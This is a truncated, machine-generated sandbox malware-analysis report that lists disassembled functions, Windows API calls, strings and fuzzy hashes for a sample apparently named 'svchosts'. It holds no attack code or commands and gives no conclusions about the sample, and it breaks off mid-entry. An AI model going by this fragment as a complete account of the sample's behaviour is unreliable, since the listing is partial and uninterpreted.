                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                      • String ID:
                                                                      • API String ID: 2092733347-0
                                                                      • Opcode ID: 83d625a479e37131fa16f7c0e73a651c7cde28a8602736e6112ee5213d21b79f
                                                                      • Instruction ID: aef15584b3c2afba86777aa0d739339e90dcc365570e6b2f76bcfdc8378d49d5
                                                                      • Opcode Fuzzy Hash: 83d625a479e37131fa16f7c0e73a651c7cde28a8602736e6112ee5213d21b79f
                                                                      • Instruction Fuzzy Hash: 9431F67A91020AEBCB00DFE5D885DEFBBBCFF58300B04445AE955E3210EB30AA55CB64
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 5d0fcc96623c50523d1cf4d9c72670c44d50b28baef05b4270aaba6a4e40dfad
                                                                      • Instruction ID: 580ce3855f81239590d703edc3d62cfcc8bc40bb6357c072128cc2e8015124ba
                                                                      • Opcode Fuzzy Hash: 5d0fcc96623c50523d1cf4d9c72670c44d50b28baef05b4270aaba6a4e40dfad
                                                                      • Instruction Fuzzy Hash: 9521B27162050EBBEB059F11CD81F6B77ADEB93784B108229FC099B201EA74EDE18790
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 002AD2F2
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002AD30C
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002AD31D
                                                                      • TranslateMessage.USER32(?), ref: 002AD327
                                                                      • DispatchMessageW.USER32(?), ref: 002AD331
                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 002AD33C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                      • String ID:
                                                                      • API String ID: 2148572870-0
                                                                      • Opcode ID: 1253f1688ba6d10eed518cfe899f8a1506cfb979f8fdc0a0ceb853da3d54d2f2
                                                                      • Instruction ID: 77d0b0cfd1b468b4f0d393b58df111e0c8fe9f09ec2ba239f0c077daa5305ca8
                                                                      • Opcode Fuzzy Hash: 1253f1688ba6d10eed518cfe899f8a1506cfb979f8fdc0a0ceb853da3d54d2f2
                                                                      • Instruction Fuzzy Hash: C1F03C72A0111ABBCB209FA1EC4CEEBBF6DEF523A1F008426F606D2010DA359555CBA1
                                                                      APIs
                                                                      • _wcschr.LIBVCRUNTIME ref: 002AC435
                                                                        • Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CompareString_wcschr
                                                                      • String ID: <$HIDE$MAX$MIN
                                                                      • API String ID: 2548945186-3358265660
                                                                      • Opcode ID: 4287d481fe0c266813211fde8567795342b1a35a6d57e9f6c28d8374dd955127
                                                                      • Instruction ID: 5ea242808020fd60c5581199f75245639dc5ba8e4897da30ea2713065401e6ec
                                                                      • Opcode Fuzzy Hash: 4287d481fe0c266813211fde8567795342b1a35a6d57e9f6c28d8374dd955127
                                                                      • Instruction Fuzzy Hash: DF31857691420DABDF21DE54CC51FEAB7BCEB1A350F104066F905D6091EFB19EE4CA60
                                                                      APIs
                                                                        • Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
                                                                        • Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365
                                                                      • EndDialog.USER32(?,00000001), ref: 002AA9DE
                                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 002AA9F6
                                                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 002AAA24
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: GETPASSWORD1$xj.
                                                                      • API String ID: 445417207-2247023717
                                                                      • Opcode ID: 42e8264c3283c349a29d221beeb423a1d8f328d8b61c5a810bc339fc5ba90863
                                                                      • Instruction ID: 40438a24292fd12c4d86bd3039c281ed05af80177608f4ab5df1ad8598649a3c
                                                                      • Opcode Fuzzy Hash: 42e8264c3283c349a29d221beeb423a1d8f328d8b61c5a810bc339fc5ba90863
                                                                      • Instruction Fuzzy Hash: E2114C3396021AB7DB219E649E09FF7777CEF0B310F000026FA45F2091CBA09974D662
                                                                      APIs
                                                                      • LoadBitmapW.USER32(00000065), ref: 002AADFD
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 002AAE22
                                                                      • DeleteObject.GDI32(00000000), ref: 002AAE54
                                                                      • DeleteObject.GDI32(00000000), ref: 002AAE77
                                                                        • Part of subcall function 002A9E1C: FindResourceW.KERNEL32(002AAE4D,PNG,?,?,?,002AAE4D,00000066), ref: 002A9E2E
                                                                        • Part of subcall function 002A9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,002AAE4D,00000066), ref: 002A9E46
                                                                        • Part of subcall function 002A9E1C: LoadResource.KERNEL32(00000000,?,?,?,002AAE4D,00000066), ref: 002A9E59
                                                                        • Part of subcall function 002A9E1C: LockResource.KERNEL32(00000000,?,?,?,002AAE4D,00000066), ref: 002A9E64
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                      • String ID: ]
                                                                      • API String ID: 142272564-3352871620
                                                                      • Opcode ID: 11a2cc1e33cb236628129b94e73594f6f5e199aa7fbf5de52a45452987db2052
                                                                      • Instruction ID: f667d1064efba4471d3696a356b6d16d9c62da7c15b3975b54d47eb33e279733
                                                                      • Opcode Fuzzy Hash: 11a2cc1e33cb236628129b94e73594f6f5e199aa7fbf5de52a45452987db2052
                                                                      • Instruction Fuzzy Hash: 63016632551212A7C7103B64AD09A7F7B79AF83B51F080025FD00A7291CF318C38CAB1
                                                                      APIs
                                                                        • Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
                                                                        • Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365
                                                                      • EndDialog.USER32(?,00000001), ref: 002ACCDB
                                                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 002ACCF1
                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 002ACD05
                                                                      • SetDlgItemTextW.USER32(?,00000068), ref: 002ACD14
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ItemText$DialogWindow
                                                                      • String ID: RENAMEDLG
                                                                      • API String ID: 445417207-3299779563
                                                                      • Opcode ID: d516386fc67fe69fc66ab72f2dacd05cae69293eeaf03a138239f985708bbcd7
                                                                      • Instruction ID: c2ebc9ccaa1e0ef061889730aeea20e8f2cbbae9507fba544947b5429ec5f595
                                                                      • Opcode Fuzzy Hash: d516386fc67fe69fc66ab72f2dacd05cae69293eeaf03a138239f985708bbcd7
                                                                      • Instruction Fuzzy Hash: BD0128332E4311BBD9114F64AD0CF673B6DEB5B752F300426F34AA60E1CEA15928CB65
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 002B251A
                                                                        • Part of subcall function 002B2B52: ___AdjustPointer.LIBCMT ref: 002B2B9C
                                                                      • _UnwindNestedFrames.LIBCMT ref: 002B2531
                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 002B2543
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 002B2567
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                      • String ID: /)+
                                                                      • API String ID: 2633735394-615169636
                                                                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                                      • Instruction ID: 0f5aef595fff2ce7559cae188b59a70f3f5e5f2f042d892ef69728e37a840856
                                                                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                                      • Instruction Fuzzy Hash: 65015732010209FBCF229F55CD01EDA3BBAEF58394F018014F91862121C736E875EFA0
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002B7573,00000000,?,002B7513,00000000,002CBAD8,0000000C,002B766A,00000000,00000002), ref: 002B75E2
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002B75F5
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,002B7573,00000000,?,002B7513,00000000,002CBAD8,0000000C,002B766A,00000000,00000002), ref: 002B7618
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 07b868cfd96b70b86717fad4c165936dc81fce4db05aa24d0095947eb4900d1b
                                                                      • Instruction ID: 26a595530ece235341c5fe383393fdc0328908dbe304966dfc16f9b658c87189
                                                                      • Opcode Fuzzy Hash: 07b868cfd96b70b86717fad4c165936dc81fce4db05aa24d0095947eb4900d1b
                                                                      • Instruction Fuzzy Hash: FAF08C31A28618BBCB159F94EC0DFDDBBB9EF45751F104168E805A2150DF309E90CA94
                                                                      APIs
                                                                        • Part of subcall function 002A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002A00A0
                                                                        • Part of subcall function 002A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0029EB86,Crypt32.dll,00000000,0029EC0A,?,?,0029EBEC,?,?,?), ref: 002A00C2
                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0029EB92
                                                                      • GetProcAddress.KERNEL32(002D81C0,CryptUnprotectMemory), ref: 0029EBA2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                      • API String ID: 2141747552-1753850145
                                                                      • Opcode ID: a0682e9befe94224e2a0594970a3e2b0bf52bc070c7e85e8df296f311027682f
                                                                      • Instruction ID: d54887adfbc30410f1901f539a92320a2206c5e0c77c145d590feecad1211995
                                                                      • Opcode Fuzzy Hash: a0682e9befe94224e2a0594970a3e2b0bf52bc070c7e85e8df296f311027682f
                                                                      • Instruction Fuzzy Hash: F5E04671820742AECF30EF38A858F42BAE46F16708B00CC1DE4D6E3680DAB4D5A48B60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: e7df4494882e3ad436fb193b00544fd5657007297256f572970b4d22198365fb
                                                                      • Instruction ID: 0ac593763ec1428f36a9094a52e2314215b090a89a301bc89a50a35beb3ec7d9
                                                                      • Opcode Fuzzy Hash: e7df4494882e3ad436fb193b00544fd5657007297256f572970b4d22198365fb
                                                                      • Instruction Fuzzy Hash: 7F41D132A203049BCB24DF78C881A9EB7B9EF89354F1645A8E515EB341EB30ED11CB80
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002BB619
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002BB63C
                                                                        • Part of subcall function 002B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002BB662
                                                                      • _free.LIBCMT ref: 002BB675
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002BB684
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: 0904d970d32380c2cbac4b87e42b4eefc67c55efafacacf596bba9ddd1486043
                                                                      • Instruction ID: d382fa61091e6f1b077745405913d4cb8d1dc839411d3f53d694910adaf93c46
                                                                      • Opcode Fuzzy Hash: 0904d970d32380c2cbac4b87e42b4eefc67c55efafacacf596bba9ddd1486043
                                                                      • Instruction Fuzzy Hash: 3201B172622612BF27225E776C8CCFB6A6DEAC6BE03154229BC04C2510DFE18D1186B0
                                                                      APIs
                                                                        • Part of subcall function 002A0A41: ResetEvent.KERNEL32(?), ref: 002A0A53
                                                                        • Part of subcall function 002A0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002A0A67
                                                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002A078F
                                                                      • CloseHandle.KERNEL32(?,?), ref: 002A07A9
                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 002A07C2
                                                                      • CloseHandle.KERNEL32(?), ref: 002A07CE
                                                                      • CloseHandle.KERNEL32(?), ref: 002A07DA
                                                                        • Part of subcall function 002A084E: WaitForSingleObject.KERNEL32(?,000000FF,002A0A78,?), ref: 002A0854
                                                                        • Part of subcall function 002A084E: GetLastError.KERNEL32(?), ref: 002A0860
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                      • String ID:
                                                                      • API String ID: 1868215902-0
                                                                      • Opcode ID: d5a82676ae335cde299206f5fbdb493ad1a0b6fb792a68db5292ee40e18618d7
                                                                      • Instruction ID: b8f1cc5d85dc0b466deafa5ebfd21dc7889e9a1ead5e871456169fb6bba4aa97
                                                                      • Opcode Fuzzy Hash: d5a82676ae335cde299206f5fbdb493ad1a0b6fb792a68db5292ee40e18618d7
                                                                      • Instruction Fuzzy Hash: 80019272450704EFC722DB65EC88FC6BBE9FB4A710F004919F15A42160CB766A54CB90
                                                                      APIs
                                                                      • _free.LIBCMT ref: 002BBF28
                                                                        • Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
                                                                        • Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506
                                                                      • _free.LIBCMT ref: 002BBF3A
                                                                      • _free.LIBCMT ref: 002BBF4C
                                                                      • _free.LIBCMT ref: 002BBF5E
                                                                      • _free.LIBCMT ref: 002BBF70
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: b49c65a83929b80de24cf7ff49716ffaadc0797daf2331497a62dd0fe485fbd5
                                                                      • Instruction ID: d3dbfbdd40894f30ff39c777c2947f0ffba43e3fb6ca54762389ca8c7049d25b
                                                                      • Opcode Fuzzy Hash: b49c65a83929b80de24cf7ff49716ffaadc0797daf2331497a62dd0fe485fbd5
                                                                      • Instruction Fuzzy Hash: 45F01272525202AB8A21EF65FE8ACA673EDBA007907654805F04ED7D11DB74FC90CF54
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002AAC85
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002AAC96
                                                                      • IsDialogMessageW.USER32(00010450,?), ref: 002AACAA
                                                                      • TranslateMessage.USER32(?), ref: 002AACB8
                                                                      • DispatchMessageW.USER32(?), ref: 002AACC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Message$DialogDispatchPeekTranslate
                                                                      • String ID:
                                                                      • API String ID: 1266772231-0
                                                                      • Opcode ID: 215746e5005ecc5adf43f304df831aa550706a6bd8d4afecdbaabb374ded3085
